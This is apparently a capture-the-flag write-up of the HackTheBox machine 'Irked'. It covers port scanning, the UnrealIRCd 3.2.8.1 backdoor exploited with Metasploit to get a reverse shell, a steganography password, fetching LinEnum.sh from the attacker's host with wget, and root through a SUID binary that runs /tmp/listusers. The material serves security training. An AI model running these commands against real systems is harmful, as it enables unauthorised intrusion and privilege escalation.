Irked


External Recon #

As usual we work our way down the KillChain. Starting with a typical nmap scan.

nmap -sC -sV -oN inital 10.10.10.117

This runs all the default labled nmap scripts, enumerates versions of found services and dumps everything into the file inital. Note that a default nmap scan just does TCP scans and only the top 1000 ports.

Here’s the output of said scan:

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)                          
| ssh-hostkey:
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)                              
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)                              
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)                             
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)                           
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))                                        
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).                                        
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          46965/udp  status
|_  100024  1          47229/tcp  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel                                     

We note the usual suspects. “Port 22/ssh” and “Port 80/http”. “Port 111/rpcbind” is somewhat unusual.

Since we found a webservice. Let’s fire up gobuster to scan the website for more intel.

gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.117 -x txt,php,htm,html

But this leads to a dead end. We find just the Apache manual and nothing more.

So let’s start exploreing what else we’ve got so far.

Explore #


#### Port 22: `ssh root@10.10.10.117`

Regular ssh service. Nothing special so far. We get promted for a password.

Port 80: #

Let’s look at the Website:

Website

This looks like an obvious hint. “IRC is almost working”. Usualy IRC runs on ports: “194/tcp” or “6667/tcp”. We haven’t seen those ports yet.

I thought at this point: “Well, perhaps those ports aren’t in the default scan of nmap?” So let’s rescan both ports:

nmap -sC -sV -p 6667,194 10.10.10.117                               

PORT     STATE  SERVICE VERSION
194/tcp  closed irc
6667/tcp closed irc

Both closed. So, what now…

Port 111: #

After all routes led to a dead end so far, it looked like “Port 111” was the only option left. So I searched for it’s intended use, and exploits of it. Long story short: It’s nothing of value for this box. If you google for “rpcbind / portmapper” exploits you find some very old ones. However I wasn’t able to accomplish anything with it. I spent a couple of hours on this rabbit hole.

Eventually I resorted to the HackTheBox forums and check the thread for this box. One guy said:

Have you scanned all the ports…

At this point I was like: “Fuck!” Sure thing, I haven’t scanned all ports on this bitch. So I finally did.

nmap -p- 10.10.10.117                                                
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
6697/tcp  open  ircs-u
8067/tcp  open  infi-async
47229/tcp open  unknown
65534/tcp open  unknown

And there we have it. “Port 6697” is open als looks like IRC is listening.

Let’s check if this is indeed IRC listening here. So I got myself an IRC client. In this case “HexChat” and conntected to the server.

IRC-Settings

IRC-Version

As you can see, I am not only connected, but I also got more intel about the specific IRC version:

Your host is irked.htb, running version Unreal3.2.8.1

Let’s check “searchsploit” if there’s an exploit already written for this version. It’s an easy box afterall.

searchsploit unreal
-------------------------------------------------------------------- ----------------------------------
| Exploit Title                                                     |  Path                           |      
|                                                                   | (/usr/share/exploitdb/)         |      
-------------------------------------------------------------------- ----------------------------------
| UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metasploit)      | exploits/linux/remote/16922.rb  |      
-------------------------------------------------------------------------------------------------------

Seems like it. :) Let’s break in!

Exploit #

Let’s fire up Metasploit. And load the exploit with use exploit. The commands within msf are fairly simple. So I don’t write them all down. Here’s the finished Exploit including the payload we will try.

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.10.10.117     yes       The target address
   RPORT  6697             yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.15.149     yes       The listen address (an interface may be specified)                                                              
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target

So let’s type “exploit”, hit enter and sure enough, we get a shell back. Sweet!

msf exploit(unix/irc/unreal_ircd_3281_backdoor) > exploit                                                                                            

[*] Started reverse TCP double handler on 10.10.15.149:4444                                                                                          
[*] 10.10.10.117:6697 - Connected to 10.10.10.117:6697...                                                                                            
    :irked.htb NOTICE AUTH :*** Looking up your hostname...                                                                                          
[*] 10.10.10.117:6697 - Sending backdoor command...                                                                                                  
[*] Accepted the first client connection...                                                                                                          
[*] Accepted the second client connection...                                                                                                         
[*] Command: echo 4DOoaoPnPoYRBF0P;                                                                                                                  
[*] Writing to socket A                                                                                                                              
[*] Writing to socket B                                                                                                                              
[*] Reading from sockets...                                                                                                                          
[*] Reading from socket A                                                                                                                            
[*] A: "4DOoaoPnPoYRBF0P\r\n"                                                                                                                        
[*] Matching...                                                                                                                                      
[*] B is input...                                                                                                                                    
[*] Command shell session 1 opened (10.10.15.149:4444 -> 10.10.10.117:52871) at 2018-12-24 21:56:58 +0100  

Let’s get a halfway decent pty shell.

python3 -c 'import pty;pty.spawn("/bin/bash")'
ircd@irked:~/Unreal3.2$

Internal Recon #

Awesome, now we have a shell. Let’s find out which users are on this box. And if we can find something usefull.

ircd@irked:~$ ls -la /home
drwxr-xr-x 20 djmardov djmardov 4096 Dec 24 15:51 djmardov
drwxr-xr-x  4 ircd     root     4096 Dec 24 13:17 ircd

ircd@irked:~$ cat /etc/passwd
djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash
ircd:x:1001:1001::/home/ircd:/bin/sh

ircd@irked:~$ sudo -l
bash: sudo: command not found

This is just a rough first overview. We probably just have two users on this box. Which typicaly means, we need to privesc to the other user first. Let’s check both home folders for more intel before we start spending time on tools like LinEnum.

ircd@irked:/home/djmardov/Documents$ ls -la
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

Nice! We found a password of some sorts. And also we’ve got a hint for what it can be used. However, let’s stop here for a second and put this in perspective.

It took me just a couple of minutes to find this file. Because I was searching for the user.txt which you is right next to the backup file. (User.txt isn’t accessible for us as you can see.)

However I wasn’t sure what to do with it. “Steg” is a reference for “Stegonography” that’s for sure. But there’s nothing where to put the password. I searched everywhere in the filesystem. After quite some time I took a break thought:

Where is typicaly some stego hidden? Well, pictures. But I don’t have a picture. …except the one on the Website!

Damn! This took me way to long. So, what next? I downloaded the picture and installed a famous tool I knew from other “Stego” Challenges called “StegHide”.

root@kali:~# steghide extract -sf irked.jpg
Enter passphrase:
wrote extracted data to "pass.txt".

root@kali:~# cat pass.txt
Kab6h+m+bbp2J:HG

Awesome! We’ve got another password. Since we found it in “djmardov” directory let’s check if it’s a password for “ssh”.

User Flag #

ssh djmardov@10.10.10.117
Password:

djmardov@irked:~$ cat Documents/user.txt
4a66a78b12dc0e************

Awesome. We are not only authenticated as a propper user, we also can get the “userflag” now.

Privilege Escalation #

Let’s hunt for the “rootflag”. I start with downloading “LinEnum.sh” from my attacker machine. I start a local webserver using python3.

Attacker #

python3 -m http.server 80

Victim #

djmardov@irked:/tmp$ wget http://10.10.15.149/LinEnum.sh                                                                                             
2018-12-24 17:42:34 (1.45 MB/s) - 'LinEnum.sh' saved [45578/45578]

djmardov@irked:/tmp$ chmod +x LinEnum.sh
djmardov@irked:/tmp$ ./LinEnum.sh -t

This is part of the relevant output. I noticed the program “viewuser”. Which has the SUID bit set. Why this program? It’s not installed on Linux by default. If you don’t know this, you only can compare a Linux install with this one.

[-] SUID files:                                                                                                                                      
-rwsr-xr-x 1 root root 53112 May 17  2017 /usr/bin/passwd                                                                                            
-rwsr-xr-x 1 root root 52344 May 17  2017 /usr/bin/chfn                                                                                              
-rwsr-xr-x 1 root root 7328 May 16  2018 /usr/bin/viewuser                                                                                           
-rwsr-xr-x 1 root root 96760 Aug 13  2014 /sbin/mount.nfs                                                                                            
-rwsr-xr-x 1 root root 38868 May 17  2017 /bin/su                                                                                                    
-rwsr-xr-x 1 root root 34684 Mar 29  2015 /bin/mount

Let’s run the programm an check what it does.

djmardov@irked:/usr/bin$ ./viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           Dec 24 17:20 (:0)
djmardov pts/0        Dec 24 17:27 (10.10.14.250)
djmardov pts/1        Dec 24 17:37 (10.10.15.149)
djmardov pts/3        Dec 24 17:45 (10.10.15.234)
sh: 1: /tmp/listusers: not found

So, it says it’s in development and should set and test user permissions. But it seems, it ran into an error because the file /tmp/listuser is missing.

Well, let’s create one. But put some cool content in there. ;)

djmardov@irked:/usr/bin$ echo /bin/bash > /tmp/listusers                                                                                             

djmardov@irked:/usr/bin$ chmod 777 /tmp/listusers

djmardov@irked:/usr/bin$ ./viewuser                                                                                                                  

This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           Dec 24 17:20 (:0)
djmardov pts/0        Dec 24 17:27 (10.10.14.250)
djmardov pts/1        Dec 24 17:37 (10.10.15.149)
djmardov pts/3        Dec 24 17:45 (10.10.15.234)
djmardov pts/5        Dec 24 17:53 (10.10.12.6)

root@irked:/usr/bin#

Aaand we are root! =)

Root Flag #

So all that is left, is to get the rootflag.

root@irked:# cat /root/root.txt
8d8e9e8be6465***********

This is a box done!

Lessons Learned #

I always forget to either scan for all ports or UDP ports when I can’t find a first entry point. This was my initial problem with this box. I had to go to the forums to get a hint. Which could have been avoided.

So, what I did is to automate my nmap scan. I just wrote a simple python3 wrapper around nmap. The UDP scan takes ages to complete btw, so I put it last.
You can find it here on my Github page.

To cite ippsec:

“It’s always good to have some recon running in the background.”

That’s all for today. Have a good one!

x41